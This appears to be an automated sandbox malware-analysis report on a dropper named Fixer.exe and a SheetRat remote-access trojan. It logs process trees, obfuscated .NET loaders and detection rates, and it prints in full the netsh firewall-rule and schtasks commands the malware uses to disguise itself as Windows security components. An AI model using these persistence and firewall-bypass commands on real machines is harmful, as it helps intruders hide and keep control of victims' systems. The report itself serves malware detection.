                      Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Fixer.exe File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\Fixer.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: Fixer.exe, 00000000.00000002.52603430679.0000000003E8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
                      Source: Fixer.exe, 00000000.00000002.52603430679.0000000003BDD000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003F36000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003EFA000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.52603430679.0000000003E81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
                      Source: Fixer.exeReversingLabs: Detection: 68%
                      Source: Fixer.exeVirustotal: Detection: 79%
                      Source: unknownProcess created: C:\Users\user\Desktop\Fixer.exe "C:\Users\user\Desktop\Fixer.exe"
                      Source: C:\Users\user\Desktop\Fixer.exeProcess created: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe "C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe"
                      Source: C:\Users\user\Desktop\Fixer.exeProcess created: C:\Users\user\AppData\Local\Temp\FixerNerest.exe "C:\Users\user\AppData\Local\Temp\FixerNerest.exe"
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess created: C:\Windows\System32\cmd.exe "CMD" netsh advfirewall firewall add rule name="7=PG%XL(%PSA%R" dir=in action=allow program="C:\Windows\System32\xdwdSecurityHealthSystrays.exe" enable=yes & exit
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\Windows\SecurityHealthSystray12" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST & exit
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc minute /mo 1 /tn "Microsoft\Windows\SecurityHealthSystray12" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc minute /mo 30 /tn "Microsoft\Windows\Schost" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST & exit
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc minute /mo 30 /tn "Microsoft\Windows\Schost" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess created: C:\Windows\System32\xdwdSecurityHealthSystrays.exe "C:\Windows\System32\xdwdSecurityHealthSystrays.exe"
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess created: C:\Windows\System32\cmd.exe "CMD" netsh advfirewall firewall add rule name=",%MUc}<NcMKXc_" dir=in action=allow program="C:\Windows\System32\Defender.exe" enable=yes & exit
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST & exit
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST
                      Source: unknownProcess created: C:\Windows\System32\xdwdSecurityHealthSystrays.exe C:\Windows\System32\xdwdSecurityHealthSystrays.exe
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess created: C:\Windows\System32\Defender.exe "C:\Windows\System32\Defender.exe"
                      Source: unknownProcess created: C:\Windows\System32\xdwdSecurityHealthSystrays.exe C:\Windows\System32\xdwdSecurityHealthSystrays.exe
                      Source: unknownProcess created: C:\Windows\System32\Defender.exe C:\Windows\System32\Defender.exe
                      Source: unknownProcess created: C:\Windows\System32\xdwdSecurityHealthSystrays.exe C:\Windows\System32\xdwdSecurityHealthSystrays.exe
                      Source: unknownProcess created: C:\Windows\System32\Defender.exe C:\Windows\System32\Defender.exe
                      Source: C:\Windows\System32\Defender.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\Defender.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\Desktop\Fixer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                      Source: Fixer.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Fixer.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\Malware\Desktop\hack tool\Backdoor\SheetRat\SheetRat\bin\Release\Stub\UserMode.pdb source: 6z9uno0baqvej0me.exe, 00000002.00000002.52853780716.00000000127E1000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: 6z9uno0baqvej0me.exe.0.dr, XvtqplFAmRakHnvLtpT.cs .Net Code: KkakfDiBwfKYVVbOUQ System.AppDomain.Load(byte[])
                      Source: 6z9uno0baqvej0me.exe.0.dr, XvtqplFAmRakHnvLtpT.cs .Net Code: KkakfDiBwfKYVVbOUQ
                      Source: 6z9uno0baqvej0me.exe.0.dr, FeMXZbEkIGjJgevW.cs .Net Code: roZsWKRBZOrvYxlj System.Reflection.Assembly.Load(byte[])
                      Source: FixerNerest.exe.0.dr, EwsvuuRydySCmvfwUdTl.cs .Net Code: FyRyFitGWcSvLUVgQQryVi System.AppDomain.Load(byte[])
                      Source: FixerNerest.exe.0.dr, EwsvuuRydySCmvfwUdTl.cs .Net Code: FyRyFitGWcSvLUVgQQryVi
                      Source: FixerNerest.exe.0.dr, GprCBzVajSFPhcvMz.cs .Net Code: NMmrnMiPoxTKxWYciysWlr System.Reflection.Assembly.Load(byte[])
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, XvtqplFAmRakHnvLtpT.cs .Net Code: KkakfDiBwfKYVVbOUQ System.AppDomain.Load(byte[])
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, XvtqplFAmRakHnvLtpT.cs .Net Code: KkakfDiBwfKYVVbOUQ
                      Source: xdwdSecurityHealthSystrays.exe.2.dr, FeMXZbEkIGjJgevW.cs .Net Code: roZsWKRBZOrvYxlj System.Reflection.Assembly.Load(byte[])
                      Source: Defender.exe.3.dr, EwsvuuRydySCmvfwUdTl.cs .Net Code: FyRyFitGWcSvLUVgQQryVi System.AppDomain.Load(byte[])
                      Source: Defender.exe.3.dr, EwsvuuRydySCmvfwUdTl.cs .Net Code: FyRyFitGWcSvLUVgQQryVi
                      Source: Defender.exe.3.dr, GprCBzVajSFPhcvMz.cs .Net Code: NMmrnMiPoxTKxWYciysWlr System.Reflection.Assembly.Load(byte[])
                      Source: Fixer.exe Static PE information: 0xD22848DC [Tue Sep 23 12:17:32 2081 UTC]
                      Source: C:\Users\user\Desktop\Fixer.exe Code function: 0_2_029CDD24 push esp; iretd 0_2_029CF149
                      Source: C:\Users\user\Desktop\Fixer.exe Code function: 0_2_0623F785 push edi; ret 0_2_0623F786
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe Code function: 2_2_00007FFA1B3C26D2 push FFFFFFE8h; ret 2_2_00007FFA1B3C26D9
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe Code function: 2_2_00007FFA1B3C00BD pushad ; iretd 2_2_00007FFA1B3C00C1
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe Code function: 3_2_00007FFA1B3D00BD pushad ; iretd 3_2_00007FFA1B3D00C1
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe Code function: 13_2_00007FFA1B3A26D2 push FFFFFFE8h; ret 13_2_00007FFA1B3A26D9
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe Code function: 13_2_00007FFA1B3A00BD pushad ; iretd 13_2_00007FFA1B3A00C1
                      Source: C:\Windows\System32\Defender.exe Code function: 20_2_00007FFA1B3C00BD pushad ; iretd 20_2_00007FFA1B3C00C1
                      Source: C:\Windows\System32\Defender.exe Code function: 22_2_00007FFA1B3900BD pushad ; iretd 22_2_00007FFA1B3900C1
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe Code function: 23_2_00007FFA1B3D26D2 push FFFFFFE8h; ret 23_2_00007FFA1B3D26D9
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe Code function: 23_2_00007FFA1B3D00BD pushad ; iretd 23_2_00007FFA1B3D00C1
                      Source: C:\Windows\System32\Defender.exe Code function: 24_2_00007FFA1B3A00BD pushad ; iretd 24_2_00007FFA1B3A00C1
                      Source: 6z9uno0baqvej0me.exe.0.dr (multiple .cs classes): High entropy of concatenated method names
                      Source: FixerNerest.exe.0.dr (multiple .cs classes): High entropy of concatenated method names
                      Source: FixerNerest.exe.0.dr, QEEFRJhvySTxMB.csHigh entropy of concatenated method names: 'aDNCrkYOApwXNfzcDoeqHTo', 'oCobulrMvsWPQUkcspDQVmTP', 'qPIhKkHPTNpwwUPxjcUJjMjEB', 'SPXYCiYcDViflIPAwGugvUoSl', 'zGPegEfLRrrvL', 'YTQtPErLujPc', 'VCxaFmsjSNZp', 'zZqXIBvmIbEvDhSnLgO', 'uKIUQmISYFG', 'DlFRVWaOgWNasfBFZvGhKmi'
                      Source: FixerNerest.exe.0.dr, jZWTVmmWOyYUMMRcqrgzxt.csHigh entropy of concatenated method names: 'ebNNwrzjWnUktguoiZGMylOI', 'MzLyzOspersHZpfP', 'CgscXvwDxaqhwt', 'EtksnlWZbuPoC', 'JjbxjihQroDOuBnCHhy', 'CfFmbefHRhIGuXnrOkM', 'foCvoYqUlZmiq', 'dedoVFDazJgwUXNwn', 'UoAOcJxCnKWrvaQXt', 'NZOHHEpsPsET'
                      Source: FixerNerest.exe.0.dr, jDcxkJFhdsO.csHigh entropy of concatenated method names: 'ZVTlUGzgCUxzHTc', 'pLyoVESOrBkIzZvCXj', 'MjNkMsfBPGdpQhesSuawUD', 'tSVqgcZubYd', 'rcalvpCDHNMTbV', 'dIxnVJfTSqCzYpMCRmRm', 'rIfGRAwfFCOKvw', 'dlIGMIHvsqeNvLvgKjRlA', 'gDJinMnnodsaYge', 'ZHjMmPnmBUKWD'
                      Source: FixerNerest.exe.0.dr, VgiXrAmmXM.csHigh entropy of concatenated method names: 'RlSpcTxUImVHRJThXP', 'UFtJFrybKqoQQdWbgICKPSM', 'PAZQNYTOWgsWXcMy', 'rneUWEdvinYVFcBsZtF', 'iOmWZtklADDvEfX', 'izsvvVekutRDrdyiHfw', 'BHvdTruejdQZEVJaBJW', 'jBcfbguXFVoYj', 'ebEPcDbAAQcrzVTXhxJjtzeP', 'mxWYOospJq'
                      Source: FixerNerest.exe.0.dr, EiphzSFywDsQvfJ.csHigh entropy of concatenated method names: 'UguORtUtzui', 'dkKlBYhllU', 'PQlvpndBHrv', 'ulpsNbUzFBfoNQWBjyB', 'AZfxgyeGWsbIhFQA', 'fUKRUAOlwiYQb', 'IqbeUFrMPwNdNZW', 'HAWpDeqCfYQL', 'QGpuZSSGbwuUTFODrnoPp', 'YumPezZyvofczqYioH'
                      Source: FixerNerest.exe.0.dr, nkKpBsREeeBrrJgLniKFn.csHigh entropy of concatenated method names: 'uPkrNGBgDoNjgrSgOmrox', 'tJdcdXdhIRyApvFJfLCy', 'NeIdpsHUXOypNVbNkc', 'CWfvlfBXaEHglzFgfUz', 'eWMkDzLcZdwuiYvEhiXynU', 'QQiNpHpwtlozgKuslTZ', 'xINxNDBywxBAJqvUUmWUkgDJu', 'PumplfOWiICkzlGrA', 'jnpqOZXzwFOQFDDpoHLGLWmn', 'nSkmkNsgHZHi'
                      Source: FixerNerest.exe.0.dr, DDkXafHupjcDyMCFpVaefrMq.csHigh entropy of concatenated method names: 'qCGRdOsVhMwopUbX', 'jnSGDElovbagPMrtBj', 'BdLVjhRzGQzBzHCIZY', 'nyUdhmSpSAEunk', 'WzXRjZmEfXvZaZNDSVmwdgzei', 'ryzBWMRAkCkHopA', 'pFlNsPEwmZBoUpAtjShnEdBj', 'aoKTKgxvjqts', 'YbuDOwKdfuCrXWHN', 'LECFRbtdbtDslzGBOtFtAP'
                      Source: FixerNerest.exe.0.dr, OLCRwsTtwxxSGZuMngxi.csHigh entropy of concatenated method names: 'STWcrGlCPAYMVdXTCakSo', 'EXEssEuclOoxwsgoE', 'hrgwYFkwWskGMPwuOyYzO', 'HnPKYYhfmOVykwrHyyHw', 'BreCYBCdhQEYAjshOhMP', 'FWkNfzCGAZsRAFwkIzWfBFx', 'akNzakQugqwUtot', 'zXhqLGzdww', 'hqkpAZTnumC', 'PJylKJbrTFUfeXGFTkj'
                      Source: FixerNerest.exe.0.dr, JqoyJMwYkYeSSSLBCERtJfL.csHigh entropy of concatenated method names: '_003CRun_003Eb__1_0', 'eiLcBLWnxSzTbooKAH', 'jdfmOziWNDFxt', 'shTrcPinsNklrCmXVRYOlwywx', 'TpJjrUFVjGVTYscvlSC', 'IfkphnZeMviWtzvseI', 'PfVTfCCtglpKgtVV', 'FTBDubJoYyZZwjRdwmwmME', 'fustWkCcYdHnKGSUEMfHE', 'UkBYhkHYicAhWJCimD'
                      Source: FixerNerest.exe.0.dr, WpAqmEEzEwNIXIzRzOYiu.csHigh entropy of concatenated method names: 'xCQxqDhktAiNXUabbXDUuhnau', 'tGJXUzpZsyZoNASUCMZJk', 'rXnAeZCPPqDFKaaVgjX', 'ccBmJDCafaAkANPljUVQWcijl', 'pstggqmlDOVB', 'aXcjopSFwKplLNHcztSABNK', 'zuKyOKBQidutustuTCsh', 'uUcfJDVDApN', 'ukueUqmJZDiTO', 'GzXhyUcdEZiTEGfMhohg'
                      Source: FixerNerest.exe.0.dr, avfHckAjbIOftjcvbDvZXrf.csHigh entropy of concatenated method names: 'YzCIvbnXWQBODZHdYFCd', 'NKwQlKHrQVjPyjchr', 'zUrIdiNsBvRASoBJKpGrKQ', 'fFvSzEqevhRCJgEhNCs', 'LZQDuOpYnbzd', 'oLDhQOoLRVSAlscGHspR', 'UGprXkORrUhn', 'UVAzxnEwuDxCIVNR', 'jKMaTENqsdZuZBlNSYH', 'IuBMMaCspOP'
                      Source: FixerNerest.exe.0.dr, XOWrfubIFwwWSRBCkfv.csHigh entropy of concatenated method names: 'GzXbQMXAGN', 'mwxeQIuYrPpc', 'GQHFLAVEzNYYrvaTWaCrnJZ', 'mltpHDkRXfUAESpG', 'DniZGZMUFVonkExqmSZGgxv', 'HBMaaOElvzkVqvgMhVB', 'wdmaXKSzPzMGrFRFNlur', 'DrkUbzqmNZKwMhd', 'lDQvEVvmdeleaz', 'aKSslBFwKbMBaBKeYorbievL'
                      Source: FixerNerest.exe.0.dr, UACsUQnggztSoYk.csHigh entropy of concatenated method names: 'VdSINmzcYlFUDFbLWy', 'fqUxahHlBoZLppD', 'uGVDiBZTjLSdbYhvpFF', 'AgsaFAyozZPezcgFBvkeR', 'OOOdKcHeWj', 'QcOOuxhClUJvodzrcutVa', 'zRdMbqVhVDgujzRq', 'yCbfgETazKke', 'cNJvcwliVrhEyGPuuzaln', 'TzpSNJlcfkClbSkoWUFYdLub'
                      Source: FixerNerest.exe.0.dr, JfAFbFqmPAXuSFACrag.csHigh entropy of concatenated method names: 'RkDnIXrgyetV', 'sVHoXFlXRvG', 'epDDikiPXN', 'cMxDNKolHBpajsOTV', 'kzpwkehncPuKFgfxebaBXNcK', 'ApPTLUQNUnNjgcSWaiYqwwIum', 'msUXXWfxkpRTRu', 'xktSOyzIexfETCEgVhx', 'YsxQqEirdEGQdNzLPcYO', 'kpZrSLvgIwlTMEEnccKQHe'
                      Source: FixerNerest.exe.0.dr, fxrViPtroaCbyONKrcHijo.csHigh entropy of concatenated method names: 'cGXWrGRrNpktfJDBwyi', 'MCfobByeOtYEqSPP', 'tBkWiomOVhBoa', 'kBSSZbjvpHncU', 'gCNtoqDwxzdOsZF', 'xqoioCXzpobxMdjF', 'ViSUHzkHnEToLiJp', 'JxolcdfNDAPGjTPY', 'XrnzqqEbAxDKeGRHrTmQisEn', 'DzUADkEQRKS'
                      Source: FixerNerest.exe.0.dr, GprCBzVajSFPhcvMz.csHigh entropy of concatenated method names: '_003CPatchMem_003Eb__0', 'WYpgNUnjwEYMhBcgWYlMeqbwj', 'NMmrnMiPoxTKxWYciysWlr', 'QuyKVUgxswZG', 'wFQLeSMeNMbPoBIdEM', 'WEVxpCMvIA', 'NYQxfchgsTfdDiXvhS', 'UokWjXaHbJRXEemyC', 'rWfvXTjrbSPRGfcjfldCgaFVG', 'bwbyQjVwqwtZQQnsv'
                      Source: FixerNerest.exe.0.dr, AgGuxbclsJDKUXCF.csHigh entropy of concatenated method names: 'PgBtGwUrqzqNZCUoKeqOHE', 'uciUipnmdWskfbbukmD', 'bmYTGiVKsMrg', 'AGRXclBCMNqgS', 'NikFbDwDHDPNAUcuQfMZeU', 'XHABEPZhmotIb', 'GPcOxzNHOlha', 'wLTsKsYMybBrniW', 'ZGMAlKPjKgVwPtOUex', 'VTvjPDvIobXKQreofUZ'
                      Source: FixerNerest.exe.0.dr, NCWTJiYmOo.csHigh entropy of concatenated method names: 'fdXRNOXStt', 'qgnMDAxeooZwPsjKWKTw', 'HeaGYfIPuIRJgLpfweYojzNG', 'HZdEBIZwljCMFeUpPufH', 'jgteZfvHMIRUZRGeLtArN', 'cnSrADyUFhyuYskZbceoZalr', 'NOLEAfPZoEGMifrIrDjW', 'tOumSXNYVBCaKnpnQEC', 'UkodNsxnfhXBVBUzRSiH', 'ASCDlYsCVb'
                      Source: FixerNerest.exe.0.dr, qmajBmcCnsP.csHigh entropy of concatenated method names: '_003CCheckWMI_003Eb__4_0', 'akoWoQJegFQzWGz', 'sLLtHQapfaLkpD', 'GhBLeixaxKaECT', 'FDgyYJtcIK', 'yqNEYpdrKSVuU', 'ukOigLYWdVIEqeEMEsBU', 'HMsllbLJjkILQeYfubylc', 'swUyynxOdtAxn', 'VxvjMMtlztaAfhKQC'
                      Source: FixerNerest.exe.0.dr, JjNonPeEqnKrhUWFcwVNuQ.csHigh entropy of concatenated method names: 'HumVdnzFHHCRoAp', 'svjgfSSfzqHTWdUvtQGtB', 'ARrhDkeCiEmKcSLjnocHVmgf', 'dmHYXtvlxuSoyPhAxICh', 'ACkJcSRtYNlMy', 'yXeKLqZfXsupYuHYed', 'WcjXOvberZhhczpjdSyrrmVer', 'ntXmAjHObxOzPP', 'MiFqKSpjKeFflGkGFfAIh', 'EYyZNYrUdCjH'
                      Source: FixerNerest.exe.0.dr, XbJdqTwlJhtvvHI.csHigh entropy of concatenated method names: 'cQQnOSFXJkniwgH', 'CtFVrLKWlIexEaFmY', 'XIDtCEWlTGfNocZTtBCm', 'QGuBFnHTjfAKNJzVJr', 'yFrEqYTCXk', 'DklHGCJsxQPSkbeDbSax', 'JAoVYBDdlljjCbQYGCxMQ', 'kjnHdLUsjxmwujwliAFPLefi', 'AOfUQdlTPQFhRYrItCmw', 'ggbUUwGBiGD'
                      Source: FixerNerest.exe.0.dr, TpneWzinmRLNNvomkAusssN.csHigh entropy of concatenated method names: 'IuRdXCfNaLeGuJEFSv', 'zBBLzbjMHFiAa', 'LVbhFPjlxnBRhsbwpa', 'gOaHiRBnqYIrKDfincXNfcODN', 'itrkLPIDuNlOt', 'DctNpwrNCJoTRM', 'EzXtYjIvFMsiHJS', 'ZjHKDiBNRSUriwsyvlpNOUUgv', 'oBwNkEkMPjJCOVyJcFO', 'NITunVTEjEPbPXu'
                      Source: FixerNerest.exe.0.dr, MtweeSvrtsEjaEHkGcqcH.csHigh entropy of concatenated method names: 'DFiwVYdhZUOx', 'YRQgkFOHierWZwABKbbd', 'prwiwWNMSkU', 'WiSpwGWsAVaqZwccgP', 'nUcjaUxnjBuPuXuCNhLNUEk', 'TQFIAukgDrh', 'uzsVyTnrFFfT', 'tOuUBXikZPJPpmpQNMD', 'mIOpqPBQtyOkldHfpMBTyX', 'jjGJgybrtcetlAFe'
                      Source: FixerNerest.exe.0.dr, vFtGvLdAuIQGYPbHNoGtunigD.csHigh entropy of concatenated method names: 'BohTfzMQNzNDrnTSGfvSzctK', 'kQyFHWNDAJoSadRuICctK', 'SabgDkkwZvXjuiNKFdAzqdeAg', 'eYraQRZnxY', 'aScSDktvqiigxwzsKGo', 'bABGMFyeFKHlpgfKXhntlEpT', 'rteRYOhIcCZRWGymOqgbxrQR', 'VdTvKWLhKVLUNhvZcMeFtB', 'oHXOIsyzcMdCkONSfO', 'LkmRAIkBVfmMuUCeomICo'
                      Source: FixerNerest.exe.0.dr, OtMRnVOsGKHl.csHigh entropy of concatenated method names: 'OaJVtSKEyPaxQqAqb', 'AYiHvMpChJPGtAijBpNMbGp', 'PelUWeNCfT', 'MqHfxgrkBosV', 'OhpLdOPujgrRaUfDv', 'batVtuKPgkWnNX', 'LFppCYRDMdKP', 'XMLhFbQvgtnuBN', 'fYvSTJOOqNtoKWgrjexs', 'YohmHMfMBuBLjYoi'
                      Source: FixerNerest.exe.0.dr, ueHNMdjwjYBvgC.csHigh entropy of concatenated method names: 'KVvAMKuWDzYAKXvnmxTAjYSYH', 'HXDGRMJZqUXHDFzIEOodZY', 'lOxMCNlCXtXCXSwiLrkgaP', 'uOBbUEkdOjjSrTzGLFR', 'OfCbpHgcmo', 'NWjDyBlQynPJToAEOMkYbJO', 'OMZmMXIrasVwIQB', 'aoSMyWjnpCR', 'CPPDHSombzDbfX', 'bSDwyLeymqBSsclwKGsp'
                      Source: FixerNerest.exe.0.dr, WYdQIVjMOZZzFKSg.csHigh entropy of concatenated method names: 'xVmIWWPGmNsQwHeZFZzsKD', 'NuZjXgamrjtndQMzBOKVIqvS', 'vZAlToetaYNwnsa', 'aAhCTAJsZydAh', 'WzHRbHaBYuPtDryDNVjJi', 'NPyuPHLUKdMnCOpWQTkZbmn', 'xSuWkIRYEflrShrTp', 'jlhPokNqFQZ', 'ObbZxxNpjCMn', 'WcxEjbQkXCCrhdJIuCAz'
                      Source: FixerNerest.exe.0.dr, sDxpENeYXPsYVcYDBrZBiKvaq.csHigh entropy of concatenated method names: 'lMRPIUZJwfRESTctpRH', 'OqlcEVUlOiIWzabSHIGXy', 'gslwZGZpUeTDP', 'apKnAnvOXvErrJmgKjnCKsrI', 'NMYNeCvKgrRyTXLQRVpshPPD', 'TjQNkhxCqmbWAssIhLSUir', 'clsXBPPywVaKT', 'xvJUwdkjuRcxjADxjFc', 'obsKwmboeAaiZdjPI', 'mObsrauEgP'
                      Source: FixerNerest.exe.0.dr, fIEdZvXcpYAipTNh.csHigh entropy of concatenated method names: 'EgSyrpMyfurJMCyrIsjumlKCY', 'AfbyDBzvzsXWnTre', 'BgSdVCqgadnKTVPaVohXhqp', 'RCFUmFQCIrJVF', 'edkScYMkfXHwReKGLKrILSw', 'tVNkCcLuVcJDnPOR', 'hXiMpnlsBfzewhMgNYHLbiDLN', 'pUGTwwZKevOKEibsAw', 'PYvxWZqGGWyTW', 'OxRliiDElDQSDUZjjhHzxCuWk'
                      Source: FixerNerest.exe.0.dr, huigHuEqBhxV.csHigh entropy of concatenated method names: 'xSzRXLdUGGB', 'ZKUsvmanhRBy', 'vZyEKNVIgqk', 'NjhhmbnhYi', 'jyFuXiXfRAOclfQwtfzt', 'jqhDsFvqNReNpOGE', 'yaILTBzHwBVeuCZ', 'PzHYqfccpDjjPvRJsagYlI', 'phwwEZLTPFYaOy', 'cTxgVQRQrAkMmUVADGj'
Source: xdwdSecurityHealthSystrays.exe.2.dr: High entropy of concatenated method names
Source: Defender.exe.3.dr: High entropy of concatenated method names
                      Source: Defender.exe.3.dr, KxxSSIzaCTUHBCvRNLqyDXZ.csHigh entropy of concatenated method names: 'TgaEpLqydIyuWCaHNS', 'mhcftdlvvpWnmYUymhulqdVe', 'DBvKkjllbnvrAhbEPuJHUMW', 'DoZThFJLym', 'cqlKFkCKkYHlzTgbiMWYrf', 'GwJSDWdksNryOejDXSBlcvDZ', 'AeaycOxxwe', 'wRyoHoPXIUSwyJ', 'GqtQKsjSDrClPzuBRzVHFUMdo', 'fRfhhcpdIHDfTVMzuwE'
                      Source: Defender.exe.3.dr, LORYroboCXxqjpTmhsXqFkvZK.csHigh entropy of concatenated method names: 'ArLDvgByOLypWkkSBihjSpzIh', 'sVsaSsNtokczcRpk', 'HnrWmGmiNsaeLrDWco', 'GntGbcwzpCGPthOrUpx', 'OFrFznPcsZc', 'cJemOhQupG', 'gGchxxzjgeiQBwoGoNUHQZGnk', 'bdmZCQIHLyX', 'RftpwVtscqZ', 'bgVzgHzpwtVVwHbSIt'
                      Source: Defender.exe.3.dr, VoFTVipipkK.csHigh entropy of concatenated method names: 'VMantYKYfAnacPRV', 'DQtAcwiaBZQaoUKaKqmcuoiCw', 'VBfrFRUkmUQUsPsMs', 'uxqfdzRZesDOhrECbhuJTzFEi', 'JqyWkhvjIzjpXfagmbhXmZ', 'pnKSjfvrmxnpaaI', 'VSyjETmJOjmM', 'XKDkZJjZPMDNHwrkpzF', 'SLEoqLVAADzsiNPmkFB', 'YjGGuVxXvZYkgiL'
                      Source: Defender.exe.3.dr, tisnIiXyTCXvDDO.csHigh entropy of concatenated method names: 'iJnrHhQxpVf', 'afkSbpIpfAFPRx', 'noTZewWYBUkKLSu', 'nCHXoSFTOuYXiEXaKQdIWwBTE', 'ixrewXlCRNJa', 'VizKjXzqwwJAvplcqA', 'ThjHbjxAmgmKQjnHaWlSvE', 'lAieBizZaMVHvlb', 'blXMJJmtQIhLFFisO', 'xGtFwRnGMyucrWz'
                      Source: Defender.exe.3.dr, gBeJmXXsXHezdPh.csHigh entropy of concatenated method names: 'eUDcfhQyzzyEOUmAxDQN', 'lmsKaeQoSgVylMzBA', 'ylfJmZSeDVdBZyULthLSE', 'zJhSdFcHmyx', 'RbrbzTrwbvLRHWe', 'TSqihvmVcUvMBwjeEI', 'sUSisaIcEyQLGbCoUIOk', 'pVzfXfueLgNzqmFBk', 'HYSiXLJplyIPVpYJDzSCVvNxs', 'DMQpwnjLGLEHynW'
                      Source: Defender.exe.3.dr, EwsvuuRydySCmvfwUdTl.csHigh entropy of concatenated method names: 'LvCpvdStvFLfKcjkzIm', 'OTwhHeTfhdsyCEsB', 'FyRyFitGWcSvLUVgQQryVi', 'JmLRMNcFjivuJUW', 'lDakBAkVJWRm', 'BDUXhIMuQgtuWjNQaMLtHF', 'uxPICpIqvpSiebWbMKOUWhpf', 'XFiKFsgvIZZSAJE', 'qxEEAioEkzjt', 'ZNIkqfjZfpxlmWCwJMAJM'
                      Source: Defender.exe.3.dr, QEEFRJhvySTxMB.csHigh entropy of concatenated method names: 'aDNCrkYOApwXNfzcDoeqHTo', 'oCobulrMvsWPQUkcspDQVmTP', 'qPIhKkHPTNpwwUPxjcUJjMjEB', 'SPXYCiYcDViflIPAwGugvUoSl', 'zGPegEfLRrrvL', 'YTQtPErLujPc', 'VCxaFmsjSNZp', 'zZqXIBvmIbEvDhSnLgO', 'uKIUQmISYFG', 'DlFRVWaOgWNasfBFZvGhKmi'
                      Source: Defender.exe.3.dr, jZWTVmmWOyYUMMRcqrgzxt.csHigh entropy of concatenated method names: 'ebNNwrzjWnUktguoiZGMylOI', 'MzLyzOspersHZpfP', 'CgscXvwDxaqhwt', 'EtksnlWZbuPoC', 'JjbxjihQroDOuBnCHhy', 'CfFmbefHRhIGuXnrOkM', 'foCvoYqUlZmiq', 'dedoVFDazJgwUXNwn', 'UoAOcJxCnKWrvaQXt', 'NZOHHEpsPsET'
